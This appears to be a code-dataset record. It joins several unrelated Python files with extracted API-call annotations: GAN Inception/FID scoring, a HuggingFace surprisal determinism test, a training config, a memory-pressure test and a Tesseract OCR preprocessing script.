637), True, 'import numpy as np\n'), ((787, 811), 'numpy.dot', 'np.dot', (['(rxy - C)', '(rxy - C)'], {}), '(rxy - C, rxy - C)\n', (793, 811), True, 'import numpy as np\n'), ((1003, 1013), 'math.cos', 'cos', (['theta'], {}), '(theta)\n', (1006, 1013), False, 'from math 
import sqrt, log, pi, sin, cos, floor\n'), ((1030, 1040), 'math.sin', 'sin', (['theta'], {}), '(theta)\n', (1033, 1040), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1042, 1052), 'math.cos', 'cos', (['theta'], {}), '(theta)\n', (1045, 1052), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1244, 1254), 'math.cos', 'cos', (['theta'], {}), '(theta)\n', (1247, 1254), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1271, 1281), 'math.sin', 'sin', (['theta'], {}), '(theta)\n', (1274, 1281), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1283, 1293), 'math.cos', 'cos', (['theta'], {}), '(theta)\n', (1286, 1293), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1016, 1026), 'math.sin', 'sin', (['theta'], {}), '(theta)\n', (1019, 1026), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1257, 1267), 'math.sin', 'sin', (['theta'], {}), '(theta)\n', (1260, 1267), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1317, 1328), 'math.cos', 'cos', (['(pi / 3)'], {}), '(pi / 3)\n', (1320, 1328), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1330, 1341), 'math.sin', 'sin', (['(pi / 3)'], {}), '(pi / 3)\n', (1333, 1341), False, 'from math import sqrt, log, pi, sin, cos, floor\n')] |
import numpy as np
import torch
import tensorflow as tf
# from tflib.inception_score import get_inception_score
from .inception_tf13 import get_inception_score
import tflib.fid as fid
BATCH_SIZE = 100
N_CHANNEL = 3
RESOLUTION = 64
NUM_SAMPLES = 50000
def cal_inception_score(G, device, z_dim):
all_samples = []
samples = torch.randn(NUM_SAMPLES, z_dim)
for i in range(0, NUM_SAMPLES, BATCH_SIZE):
samples_100 = samples[i:i + BATCH_SIZE]
samples_100 = samples_100.to(device=device)
all_samples.append(G(samples_100).cpu().data.numpy())
all_samples = np.concatenate(all_samples, axis=0)
all_samples = np.multiply(np.add(np.multiply(all_samples, 0.5), 0.5), 255).astype('int32')
all_samples = all_samples.reshape((-1, N_CHANNEL, RESOLUTION, RESOLUTION)) #.transpose(0, 2, 3, 1)
return get_inception_score(all_samples)
def cal_inception_score_o(G, device, z_dim):
all_samples = []
samples = torch.randn(NUM_SAMPLES, z_dim)
for i in range(0, NUM_SAMPLES, BATCH_SIZE):
samples_100 = samples[i:i + BATCH_SIZE]
samples_100 = samples_100.to(device=device)
all_samples.append(G(samples_100).cpu().data.numpy())
all_samples = np.concatenate(all_samples, axis=0)
all_samples = np.multiply(np.add(np.multiply(all_samples, 0.5), 0.5), 255).astype('int32')
all_samples = all_samples.reshape((-1, N_CHANNEL, RESOLUTION, RESOLUTION)) #.transpose(0, 2, 3, 1)
return get_inception_score(list(all_samples))
def cal_fid_score(G, device, z_dim):
stats_path = 'tflib/data/fid_stats_lsun_train.npz'
inception_path = fid.check_or_download_inception('tflib/model')
f = np.load(stats_path)
mu_real, sigma_real = f['mu'][:], f['sigma'][:]
f.close()
fid.create_inception_graph(inception_path)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
all_samples = []
samples = torch.randn(NUM_SAMPLES, z_dim, 1, 1)
for i in range(0, NUM_SAMPLES, BATCH_SIZE):
samples_100 = samples[i:i + BATCH_SIZE]
samples_100 = samples_100.to(device=device)
all_samples.append(G(samples_100).cpu().data.numpy())
all_samples = np.concatenate(all_samples, axis=0)
all_samples = np.multiply(np.add(np.multiply(all_samples, 0.5), 0.5), 255).astype('int32')
all_samples = all_samples.reshape((-1, N_CHANNEL, RESOLUTION, RESOLUTION)).transpose(0, 2, 3, 1)
with tf.Session(config=config) as sess:
sess.run(tf.global_variables_initializer())
mu_gen, sigma_gen = fid.calculate_activation_statistics(all_samples, sess, batch_size=BATCH_SIZE)
fid_value = fid.calculate_frechet_distance(mu_gen, sigma_gen, mu_real, sigma_real)
return fid_value
| [
"tflib.fid.check_or_download_inception",
"numpy.load",
"numpy.multiply",
"tflib.fid.calculate_activation_statistics",
"tensorflow.global_variables_initializer",
"tflib.fid.calculate_frechet_distance",
"tensorflow.Session",
"torch.randn",
"tensorflow.ConfigProto",
"tflib.fid.create_inception_graph"... | [((332, 363), 'torch.randn', 'torch.randn', (['NUM_SAMPLES', 'z_dim'], {}), '(NUM_SAMPLES, z_dim)\n', (343, 363), False, 'import torch\n'), ((593, 628), 'numpy.concatenate', 'np.concatenate', (['all_samples'], {'axis': '(0)'}), '(all_samples, axis=0)\n', (607, 628), True, 'import numpy as np\n'), ((953, 984), 'torch.randn', 'torch.randn', (['NUM_SAMPLES', 'z_dim'], {}), '(NUM_SAMPLES, z_dim)\n', (964, 984), False, 'import torch\n'), ((1214, 1249), 'numpy.concatenate', 'np.concatenate', (['all_samples'], {'axis': '(0)'}), '(all_samples, axis=0)\n', (1228, 1249), True, 'import numpy as np\n'), ((1613, 1659), 'tflib.fid.check_or_download_inception', 'fid.check_or_download_inception', (['"""tflib/model"""'], {}), "('tflib/model')\n", (1644, 1659), True, 'import tflib.fid as fid\n'), ((1668, 1687), 'numpy.load', 'np.load', (['stats_path'], {}), '(stats_path)\n', (1675, 1687), True, 'import numpy as np\n'), ((1758, 1800), 'tflib.fid.create_inception_graph', 'fid.create_inception_graph', (['inception_path'], {}), '(inception_path)\n', (1784, 1800), True, 'import tflib.fid as fid\n'), ((1814, 1830), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (1828, 1830), True, 'import tensorflow as tf\n'), ((1910, 1947), 'torch.randn', 'torch.randn', (['NUM_SAMPLES', 'z_dim', '(1)', '(1)'], {}), '(NUM_SAMPLES, z_dim, 1, 1)\n', (1921, 1947), False, 'import torch\n'), ((2177, 2212), 'numpy.concatenate', 'np.concatenate', (['all_samples'], {'axis': '(0)'}), '(all_samples, axis=0)\n', (2191, 2212), True, 'import numpy as np\n'), ((2629, 2699), 'tflib.fid.calculate_frechet_distance', 'fid.calculate_frechet_distance', (['mu_gen', 'sigma_gen', 'mu_real', 'sigma_real'], {}), '(mu_gen, sigma_gen, mu_real, sigma_real)\n', (2659, 2699), True, 'import tflib.fid as fid\n'), ((2419, 2444), 'tensorflow.Session', 'tf.Session', ([], {'config': 'config'}), '(config=config)\n', (2429, 2444), True, 'import tensorflow as tf\n'), ((2534, 2611), 
'tflib.fid.calculate_activation_statistics', 'fid.calculate_activation_statistics', (['all_samples', 'sess'], {'batch_size': 'BATCH_SIZE'}), '(all_samples, sess, batch_size=BATCH_SIZE)\n', (2569, 2611), True, 'import tflib.fid as fid\n'), ((2471, 2504), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (2502, 2504), True, 'import tensorflow as tf\n'), ((666, 695), 'numpy.multiply', 'np.multiply', (['all_samples', '(0.5)'], {}), '(all_samples, 0.5)\n', (677, 695), True, 'import numpy as np\n'), ((1287, 1316), 'numpy.multiply', 'np.multiply', (['all_samples', '(0.5)'], {}), '(all_samples, 0.5)\n', (1298, 1316), True, 'import numpy as np\n'), ((2250, 2279), 'numpy.multiply', 'np.multiply', (['all_samples', '(0.5)'], {}), '(all_samples, 0.5)\n', (2261, 2279), True, 'import numpy as np\n')] |
"""
Test support for HuggingFace models.
"""
import numpy as np
import pytest
import lm_zoo as Z
from syntaxgym import compute_surprisals, evaluate
from syntaxgym.suite import Suite
zoo = Z.get_registry()
def huggingface_model_fixture(request):
"""
Defines a generic HF model fixture to be parameterized in a few different
ways
"""
model_ref = request.param
model = zoo[f"huggingface://{model_ref}"]
return model
huggingface_model_word_refs = [
"hf-internal-testing/tiny-random-transfo-xl"
]
"""Word-level tokenization HF models"""
huggingface_model_subword_refs = [
"hf-internal-testing/tiny-xlm-roberta"
]
"""Subword-tokenization HF models"""
huggingface_model = pytest.fixture(
huggingface_model_fixture,
scope="module",
params=huggingface_model_word_refs + huggingface_model_subword_refs)
def test_hf_deterministic(dummy_suite_json, huggingface_model):
"""
Test that suite evaluations are deterministic across multiple invocations.
"""
suite = Suite.from_dict(dummy_suite_json)
surps_df = compute_surprisals(huggingface_model, suite)
# Again!
surps_df2 = compute_surprisals(huggingface_model, suite)
for i1, i2 in zip(surps_df.items, surps_df2.items):
for c1, c2 in zip(i1["conditions"], i2["conditions"]):
for r1, r2 in zip(c1["regions"], c2["regions"]):
np.testing.assert_almost_equal(r1["metric_value"]["sum"],
r2["metric_value"]["sum"])
| [
"syntaxgym.compute_surprisals",
"numpy.testing.assert_almost_equal",
"pytest.fixture",
"lm_zoo.get_registry",
"syntaxgym.suite.Suite.from_dict"
] | [((192, 208), 'lm_zoo.get_registry', 'Z.get_registry', ([], {}), '()\n', (206, 208), True, 'import lm_zoo as Z\n'), ((713, 844), 'pytest.fixture', 'pytest.fixture', (['huggingface_model_fixture'], {'scope': '"""module"""', 'params': '(huggingface_model_word_refs + huggingface_model_subword_refs)'}), "(huggingface_model_fixture, scope='module', params=\n huggingface_model_word_refs + huggingface_model_subword_refs)\n", (727, 844), False, 'import pytest\n'), ((1027, 1060), 'syntaxgym.suite.Suite.from_dict', 'Suite.from_dict', (['dummy_suite_json'], {}), '(dummy_suite_json)\n', (1042, 1060), False, 'from syntaxgym.suite import Suite\n'), ((1076, 1120), 'syntaxgym.compute_surprisals', 'compute_surprisals', (['huggingface_model', 'suite'], {}), '(huggingface_model, suite)\n', (1094, 1120), False, 'from syntaxgym import compute_surprisals, evaluate\n'), ((1151, 1195), 'syntaxgym.compute_surprisals', 'compute_surprisals', (['huggingface_model', 'suite'], {}), '(huggingface_model, suite)\n', (1169, 1195), False, 'from syntaxgym import compute_surprisals, evaluate\n'), ((1393, 1482), 'numpy.testing.assert_almost_equal', 'np.testing.assert_almost_equal', (["r1['metric_value']['sum']", "r2['metric_value']['sum']"], {}), "(r1['metric_value']['sum'], r2['metric_value'\n ]['sum'])\n", (1423, 1482), True, 'import numpy as np\n')] |
import numpy as np
import torch
import torch.nn as nn
import src.net as net
def get_device():
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
print('Device State:', device)
return device
class DL_Config(object):
def __init__(self) -> None:
self.basic_config()
self.net_config()
self.performance_config()
self.save_config()
def basic_config(self):
self.SEED: int = 24
self.NUM_EPOCH: int = 1000
self.BATCH_SIZE: int = 512
self.earlyStop: int or None = None
np.random.seed(self.SEED)
torch.manual_seed(self.SEED)
if torch.cuda.is_available():
torch.cuda.manual_seed_all(self.SEED)
def net_config(self):
self.isClassified = False
self.net = net.Net04(93).to(get_device())
self.loss_func = nn.MSELoss(reduction='mean')
self.optimizer = torch.optim.SGD(self.net.parameters(), lr=1e-4, momentum=0.9)
self.min_MES = 1000.0
def performance_config(self):
self.printPerformance: bool = True
self.showPlot: bool = True
self.savePerformance: bool = True
self.savePlot: bool = True
def save_config(self):
self.saveDir = './out/test/'
self.saveModel = True
self.checkpoint = 0
self.bestModelSave = True
self.onlyParameters = True
| [
"src.net.Net04",
"torch.nn.MSELoss",
"numpy.random.seed",
"torch.manual_seed",
"torch.cuda.manual_seed_all",
"torch.cuda.is_available"
] | [((121, 146), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (144, 146), False, 'import torch\n'), ((565, 590), 'numpy.random.seed', 'np.random.seed', (['self.SEED'], {}), '(self.SEED)\n', (579, 590), True, 'import numpy as np\n'), ((599, 627), 'torch.manual_seed', 'torch.manual_seed', (['self.SEED'], {}), '(self.SEED)\n', (616, 627), False, 'import torch\n'), ((639, 664), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (662, 664), False, 'import torch\n'), ((852, 880), 'torch.nn.MSELoss', 'nn.MSELoss', ([], {'reduction': '"""mean"""'}), "(reduction='mean')\n", (862, 880), True, 'import torch.nn as nn\n'), ((678, 715), 'torch.cuda.manual_seed_all', 'torch.cuda.manual_seed_all', (['self.SEED'], {}), '(self.SEED)\n', (704, 715), False, 'import torch\n'), ((796, 809), 'src.net.Net04', 'net.Net04', (['(93)'], {}), '(93)\n', (805, 809), True, 'import src.net as net\n')] |
if __name__ == '__main__':
import numpy as np
import pandas as pd
import os
print('\n Memory Pressure Test Starts...\n')
for i in os.listdir():
if 'mprofile_' in i:
df = pd.read_csv(i, sep=' ', error_bad_lines=False)
df.columns = ['null', 'memory', 'time']
df.drop('null', 1, inplace=True)
std_limit = 5
highest_limit = 800
std = np.std(np.array(df.memory.values[1500:]))
highest = df.memory.max()
if std > std_limit:
raise Exception('MEMORY TEST FAILED: Standard deviation of memory pressure is %d which is above the %d limit' % (std, std_limit))
if highest > highest_limit:
raise Exception('MEMORY TEST FAILED: Max memory is %d which is above the %d limit' % (highest, highest_limit))
print("\n Memory Pressure Test Passed \n")
| [
"pandas.read_csv",
"numpy.array",
"os.listdir"
] | [((153, 165), 'os.listdir', 'os.listdir', ([], {}), '()\n', (163, 165), False, 'import os\n'), ((403, 436), 'numpy.array', 'np.array', (['df.memory.values[1500:]'], {}), '(df.memory.values[1500:])\n', (411, 436), True, 'import numpy as np\n'), ((213, 259), 'pandas.read_csv', 'pd.read_csv', (['i'], {'sep': '""" """', 'error_bad_lines': '(False)'}), "(i, sep=' ', error_bad_lines=False)\n", (224, 259), True, 'import pandas as pd\n')] |
#!/usr/bin/python3
from PIL import Image
import matplotlib.pyplot as plt
import numpy as np
import cv2
import pytesseract
import json
import sys
import os
import re
# the setrecursionlimit function is
# used to modify the default recursion
# limit set by python. Using this,
# we can increase the recursion limit
# to satisfy our needs
sys.setrecursionlimit(10**6)
debug = False
newlineChar = False
configJsonPath = "config.json"
if not os.path.isfile(configJsonPath):
raise ValueError("could not find '{}'".format(configJsonPath))
index = 0
while index < len(sys.argv):
arg = sys.argv[index]
if arg[0] == '-':
if arg == '--debug' or arg == '-d':
debug = True
print("Debug is {}".format(debug))
elif arg[0:len("--newline")] == "--newline":
_, value = arg.split('=')
newlineChar = value
elif arg == "-n":
newlineChar = sys.argv[index+1]
index += 1
else:
imagePath = arg
if not os.path.isfile(imagePath):
raise ValueError("image '{}' does not exist".format(imagePath))
index += 1
with open(configJsonPath, 'r') as in_file:
config = json.load(in_file)
pytesseract.pytesseract.tesseract_cmd = config["tesseract"]["path"]
customConfig = config["tesseract"]["options"]
if not newlineChar:
newlineChar = config["newline"]
def debugImage(image, imagePath, imageNumber=1, title=None, grayscale=False):
filepath, extension = os.path.splitext(imagePath)
plt.figure(figsize=(10,10))
if title:
plt.title(title)
if grayscale:
plt.imshow(image, cmap='gray');
else:
plt.imshow(image);
plt.xticks([]);
plt.yticks([])
plt.savefig('{}-{}.png'.format(filepath,imageNumber),bbox_inches='tight')
plt.close()
def findTop(image, x, y, value, visited ):
if y == 0:
return 0
top = y
if value == image[y-1,x]:
visited[y-1,x] = 1
top = min(top, findTop(image, x, y-1, value, visited))
if x < image.shape[1]-1 and visited[y,x+1] == 0:
visited[y,x+1] = 1
if value == image[y, x+1]:
top = min(top, findTop(image, x+1, y, value, visited))
if x > 0 and visited[y,x-1] == 0:
visited[y,x-1] = 1
if value == image[y, x-1]:
top = min(top, findTop(image, x-1, y,value, visited))
if y < image.shape[0] - 1 and visited[y+1,x] == 0:
visited[y+1,x] = 1
if value == image[y+1, x]:
top = min(top, findTop(image, x, y+1, value, visited))
return top
def findLeft(image, x, y, value, visited ):
if x == 0:
return 0
left = x
if value == image[y,x-1]:
visited[y, x-1] = 1
left = min(left, findLeft(image, x-1, y, value, visited))
if y > 0 and visited[y-1,x] == 0:
visited[y-1,x] = 1
if value == image[y-1, x]:
left = min(left, findLeft(image, x, y-1, value, visited))
if y < image.shape[0]-1 and visited[y+1,x] == 0:
visited[y+1,x] = 1
if value == image[y+1, x]:
left = min(left, findLeft(image, x, y+1, value, visited))
if x < image.shape[1]-1 and visited[y,x+1] == 0:
visited[y,x+1] = 1
if value == image[y, x+1]:
left = min(left, findLeft(image, x+1, y, value, visited))
return left
def findBottom(image, x, y, value, visited ):
if y >= image.shape[0]-1:
return image.shape[0]-1
bottom = y
if value == image[y+1,x]:
visited[y+1,x] = 1
bottom = max(bottom, findBottom(image, x, y+1, value, visited))
if x < image.shape[1]-1 and visited[y,x+1] == 0:
visited[y,x+1] = 1
if value == image[y, x+1]:
bottom = max(bottom, findBottom(image, x+1, y,value, visited))
if x > 0 and visited[y,x-1] == 0 :
visited[y,x-1] = 1
if value == image[y, x-1]:
bottom = max(bottom, findBottom(image, x-1, y, value, visited))
if y > 0 and visited[y-1,x] == 0:
visited[y-1,x] = 1
if value == image[y-1, x]:
bottom = max(bottom, findBottom(image, x, y-1, value, visited))
return bottom
def findRight(image, x, y, value, visited ):
if x >= image.shape[1]-1:
return image.shape[1]-1
right = x
if value == image[y,x+1]:
visited[y,x+1] = 1
right = max(right, findRight(image, x+1, y, value, visited))
if y > 0 and visited[y-1,x] == 0:
visited[y-1,x] = 1
if value == image[y-1, x]:
# print("RIGHT, GO UP {} {} {} {}".format(x,y, image.shape[0], right))
right = max(right, findRight(image, x, y-1, value, visited))
if y < image.shape[0]-1 and visited[y+1,x] == 0:
visited[y+1,x] = 1
if value == image[y+1, x]:
# print("RIGHT, GO DOWN {} {} {}".format(x,y, image.shape[0]))
right = max(right, findRight(image, x, y+1, value, visited))
if x > 0 and visited[y,x-1] == 0:
visited[y,x-1] = 1
if value == image[y, x-1]:
right = max(right, findRight(image, x-1, y, value, visited))
return right
def _getBoundingBoxForPixel(image, x, y, value, visited):
top = findTop(image, x, y, value, visited)
visited = np.zeros(image.shape, dtype=np.int8)
bottom = findBottom(image, x, y, value, visited)
visited = np.zeros(image.shape, dtype=np.int8)
left = findLeft(image, x, y, value, visited)
visited = np.zeros(image.shape, dtype=np.int8)
right = findRight(image, x, y, value, visited)
return {
"width": right - left,
"height": bottom - top,
"top": top,
"bottom": bottom,
"left": left,
"right": right,
"visited": visited
}
def getBoundingBoxForPixel(image, x, y, value):
"""
Given a pixel position we then want to say what the maximum width is that its connected to
and what the maximum height its connected to. This will give us a bounding box for the
pixel.
This is currently subject to local tops e.g. if you are at the bottom left of an S
then it won't be joined to the top of the S.
"""
visited = np.zeros(image.shape, dtype=np.int8)
return _getBoundingBoxForPixel(image, x, y, value, visited)
def setPixelsMovingToTop(image, x, y, oldvalue, newvalue, visited):
    """Recolor the run of ``oldvalue`` pixels connected to (x, y) to
    ``newvalue``, moving only up, right and left (never down).

    The start pixel is always recolored regardless of its value (matching
    the original behavior), and ``visited`` is marked 1 for every pixel
    processed.

    Rewritten with an explicit stack: the previous recursive version could
    exceed Python's recursion limit on large connected regions.
    """
    height, width = image.shape[0], image.shape[1]
    image[y, x] = newvalue
    visited[y, x] = 1
    stack = [(x, y)]
    while stack:
        cx, cy = stack.pop()
        # moves allowed while drifting toward the top: up, right, left
        for nx, ny in ((cx, cy - 1), (cx + 1, cy), (cx - 1, cy)):
            if (0 <= nx < width and 0 <= ny < height
                    and visited[ny, nx] == 0 and image[ny, nx] == oldvalue):
                visited[ny, nx] = 1
                image[ny, nx] = newvalue
                stack.append((nx, ny))
def setPixelsMovingToLeft(image, x, y, oldvalue, newvalue, visited):
    """Recolor the run of ``oldvalue`` pixels connected to (x, y) to
    ``newvalue``, moving only left, up and down (never right).

    The start pixel is always recolored regardless of its value (matching
    the original behavior), and ``visited`` is marked 1 for every pixel
    processed.

    Rewritten with an explicit stack: the previous recursive version could
    exceed Python's recursion limit on large connected regions.
    """
    height, width = image.shape[0], image.shape[1]
    image[y, x] = newvalue
    visited[y, x] = 1
    stack = [(x, y)]
    while stack:
        cx, cy = stack.pop()
        # moves allowed while drifting toward the left: left, up, down
        for nx, ny in ((cx - 1, cy), (cx, cy - 1), (cx, cy + 1)):
            if (0 <= nx < width and 0 <= ny < height
                    and visited[ny, nx] == 0 and image[ny, nx] == oldvalue):
                visited[ny, nx] = 1
                image[ny, nx] = newvalue
                stack.append((nx, ny))
def setPixelsMovingToBottom(image, x, y, oldvalue, newvalue, visited):
    """Recolor the run of ``oldvalue`` pixels connected to (x, y) to
    ``newvalue``, moving only down, right and left (never up).

    The start pixel is always recolored regardless of its value (matching
    the original behavior), and ``visited`` is marked 1 for every pixel
    processed.

    Rewritten with an explicit stack: the previous recursive version could
    exceed Python's recursion limit on large connected regions.
    """
    height, width = image.shape[0], image.shape[1]
    image[y, x] = newvalue
    visited[y, x] = 1
    stack = [(x, y)]
    while stack:
        cx, cy = stack.pop()
        # moves allowed while drifting toward the bottom: down, right, left
        for nx, ny in ((cx, cy + 1), (cx + 1, cy), (cx - 1, cy)):
            if (0 <= nx < width and 0 <= ny < height
                    and visited[ny, nx] == 0 and image[ny, nx] == oldvalue):
                visited[ny, nx] = 1
                image[ny, nx] = newvalue
                stack.append((nx, ny))
def setPixelsMovingToRight(image, x, y, oldvalue, newvalue, visited):
    """Recolor the run of ``oldvalue`` pixels connected to (x, y) to
    ``newvalue``, moving only right, up and down (never left).

    The start pixel is always recolored regardless of its value (matching
    the original behavior), and ``visited`` is marked 1 for every pixel
    processed.

    Rewritten with an explicit stack: the previous recursive version could
    exceed Python's recursion limit on large connected regions.
    """
    height, width = image.shape[0], image.shape[1]
    image[y, x] = newvalue
    visited[y, x] = 1
    stack = [(x, y)]
    while stack:
        cx, cy = stack.pop()
        # moves allowed while drifting toward the right: right, up, down
        for nx, ny in ((cx + 1, cy), (cx, cy - 1), (cx, cy + 1)):
            if (0 <= nx < width and 0 <= ny < height
                    and visited[ny, nx] == 0 and image[ny, nx] == oldvalue):
                visited[ny, nx] = 1
                image[ny, nx] = newvalue
                stack.append((nx, ny))
def setBoundingBoxForPixel(image, x, y, oldvalue, newvalue):
    """Recolor the whole region connected to (x, y) from ``oldvalue`` to
    ``newvalue`` by running the four directional flood fills in turn,
    sharing a single scratch ``visited`` array across them.
    """
    visited = np.zeros(image.shape, dtype=np.int8)
    for painter in (setPixelsMovingToTop, setPixelsMovingToBottom,
                    setPixelsMovingToLeft, setPixelsMovingToRight):
        painter(image, x, y, oldvalue, newvalue, visited)
def extractText(image, imagePath):
    """Isolate dark text pixels in ``image`` and return a binary image
    suitable for OCR.

    Pipeline: bilateral filter -> greyscale -> inverse binary threshold,
    then a connected-component pass that erases shapes too small
    (height < 7px) or too tall (> 80% of the image) to be text.

    NOTE(review): relies on module globals ``debug`` and ``debugImage``
    and on the flood-fill helpers defined above.
    """
    # grab the image dimensions
    h = image.shape[0]
    w = image.shape[1]
    if debug:
        debugImage(image, imagePath, 0, "Starting image")
    ## Remove noise and preserve edges
    ## diameter of pixel neighourhood
    ## sigmaColor - the larger this value the more distant the color in the neighbourhood will influence color
    ## sigmaSpace - the larger this value the more pixels further away will influence the colour blending
    image= cv2.bilateralFilter(image,5, 55,60)
    if debug:
        debugImage(image, imagePath, 1, "After filter")
    ## convert to greyscale
    image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    if debug:
        debugImage(image, imagePath, 2, "Conversion to greyscale", True)
    # Here are the possible options for thresholding THRESH_BINARY_INV
    # seems to work best.
    # It returns the threshold used and the image.
    thresholdLevel, image = cv2.threshold(image, 240, 255, cv2.THRESH_BINARY_INV)
    if debug:
        debugImage(image, imagePath, 3, "After thresholding (level used: {})".format(thresholdLevel), True)
    # if we have more black than white then we have that as our expected text colour
    # (vectorised: the previous per-pixel Python loop did the same count
    # in O(h*w) interpreter steps)
    black = int(np.count_nonzero(image == 0))
    if black / (h * w) > 0.8: # lots of black so text is white
        textColor = 255
        backgroundColor = 0
    else: # lots of white so text is black
        textColor = 0
        backgroundColor = 255
    # this is out custom code that captures a connected block within the image
    n = 300
    nn = 100
    if debug:
        print("Processing connected shapes")
    globalVisited = np.zeros(image.shape)
    for y in range(0,h):
        for x in range(0,w):
            if globalVisited[y,x] == 0 and image[y,x] == 0:
                bounds = getBoundingBoxForPixel(image,x,y, textColor)
                if bounds["height"] < 7 or (bounds["height"] / image.shape[0]) > 0.8:
                    if debug:
                        print("{}: ({},{}) w={} h={} top={} bottom={}".format(n, x, y, bounds["width"], bounds["height"], bounds["top"], bounds["bottom"]))
                        debugImage(bounds["visited"], imagePath, n, "connected shape", True)
                        n += 1
                    setBoundingBoxForPixel(image, x, y, textColor, backgroundColor)
                    if debug:
                        debugImage(image, imagePath, nn, "image after removal of connected shape", True)
                        nn += 1
                globalVisited = np.logical_or(globalVisited, bounds["visited"])
    if debug:
        debugImage(image, imagePath, 4, "Remove small items and large blocks of stuff", True)
    # TODO tesseract is not great at finding spaces e.g. I LOVE and IT LOOK
    # after the last bit of processing we have a pretty good idea of the space
    # between letters so we could write our own space detector...
    return image
# Driver: load the image, strip it down to text pixels, OCR it with
# tesseract, and print the text with newlines replaced for HTML output.
# NOTE(review): depends on module globals imagePath, customConfig and
# newlineChar defined earlier in the script -- confirm.
image = np.array(Image.open(imagePath))
image = extractText(image, imagePath)
text = pytesseract.image_to_string(image, lang='eng', config=customConfig)
text = text.strip() ## remove last newline
text = re.sub("\n\n+", "\n", text) ## replace multiple newlines with a single one
print(text.replace('\n', newlineChar)) ## convert newline to <br/>
| [
"matplotlib.pyplot.title",
"json.load",
"cv2.cvtColor",
"matplotlib.pyplot.close",
"cv2.threshold",
"matplotlib.pyplot.yticks",
"numpy.zeros",
"matplotlib.pyplot.imshow",
"pytesseract.image_to_string",
"PIL.Image.open",
"cv2.bilateralFilter",
"os.path.isfile",
"matplotlib.pyplot.figure",
"... | [((346, 376), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(10 ** 6)'], {}), '(10 ** 6)\n', (367, 376), False, 'import sys\n'), ((11401, 11468), 'pytesseract.image_to_string', 'pytesseract.image_to_string', (['image'], {'lang': '"""eng"""', 'config': 'customConfig'}), "(image, lang='eng', config=customConfig)\n", (11428, 11468), False, 'import pytesseract\n'), ((11535, 11562), 're.sub', 're.sub', (['"""\n\n+"""', '"""\n"""', 'text'], {}), "('\\n\\n+', '\\n', text)\n", (11541, 11562), False, 'import re\n'), ((449, 479), 'os.path.isfile', 'os.path.isfile', (['configJsonPath'], {}), '(configJsonPath)\n', (463, 479), False, 'import os\n'), ((1118, 1136), 'json.load', 'json.load', (['in_file'], {}), '(in_file)\n', (1127, 1136), False, 'import json\n'), ((1411, 1438), 'os.path.splitext', 'os.path.splitext', (['imagePath'], {}), '(imagePath)\n', (1427, 1438), False, 'import os\n'), ((1441, 1469), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (1451, 1469), True, 'import matplotlib.pyplot as plt\n'), ((1589, 1603), 'matplotlib.pyplot.xticks', 'plt.xticks', (['[]'], {}), '([])\n', (1599, 1603), True, 'import matplotlib.pyplot as plt\n'), ((1608, 1622), 'matplotlib.pyplot.yticks', 'plt.yticks', (['[]'], {}), '([])\n', (1618, 1622), True, 'import matplotlib.pyplot as plt\n'), ((1701, 1712), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (1710, 1712), True, 'import matplotlib.pyplot as plt\n'), ((4841, 4877), 'numpy.zeros', 'np.zeros', (['image.shape'], {'dtype': 'np.int8'}), '(image.shape, dtype=np.int8)\n', (4849, 4877), True, 'import numpy as np\n'), ((4941, 4977), 'numpy.zeros', 'np.zeros', (['image.shape'], {'dtype': 'np.int8'}), '(image.shape, dtype=np.int8)\n', (4949, 4977), True, 'import numpy as np\n'), ((5037, 5073), 'numpy.zeros', 'np.zeros', (['image.shape'], {'dtype': 'np.int8'}), '(image.shape, dtype=np.int8)\n', (5045, 5073), True, 'import numpy as np\n'), ((5705, 5741), 'numpy.zeros', 
'np.zeros', (['image.shape'], {'dtype': 'np.int8'}), '(image.shape, dtype=np.int8)\n', (5713, 5741), True, 'import numpy as np\n'), ((8235, 8271), 'numpy.zeros', 'np.zeros', (['image.shape'], {'dtype': 'np.int8'}), '(image.shape, dtype=np.int8)\n', (8243, 8271), True, 'import numpy as np\n'), ((9010, 9047), 'cv2.bilateralFilter', 'cv2.bilateralFilter', (['image', '(5)', '(55)', '(60)'], {}), '(image, 5, 55, 60)\n', (9029, 9047), False, 'import cv2\n'), ((9147, 9186), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2GRAY'], {}), '(image, cv2.COLOR_BGR2GRAY)\n', (9159, 9186), False, 'import cv2\n'), ((9437, 9490), 'cv2.threshold', 'cv2.threshold', (['image', '(240)', '(255)', 'cv2.THRESH_BINARY_INV'], {}), '(image, 240, 255, cv2.THRESH_BINARY_INV)\n', (9450, 9490), False, 'import cv2\n'), ((10159, 10180), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (10167, 10180), True, 'import numpy as np\n'), ((11333, 11354), 'PIL.Image.open', 'Image.open', (['imagePath'], {}), '(imagePath)\n', (11343, 11354), False, 'from PIL import Image\n'), ((1485, 1501), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (1494, 1501), True, 'import matplotlib.pyplot as plt\n'), ((1522, 1552), 'matplotlib.pyplot.imshow', 'plt.imshow', (['image'], {'cmap': '"""gray"""'}), "(image, cmap='gray')\n", (1532, 1552), True, 'import matplotlib.pyplot as plt\n'), ((1567, 1584), 'matplotlib.pyplot.imshow', 'plt.imshow', (['image'], {}), '(image)\n', (1577, 1584), True, 'import matplotlib.pyplot as plt\n'), ((953, 978), 'os.path.isfile', 'os.path.isfile', (['imagePath'], {}), '(imagePath)\n', (967, 978), False, 'import os\n'), ((10919, 10966), 'numpy.logical_or', 'np.logical_or', (['globalVisited', 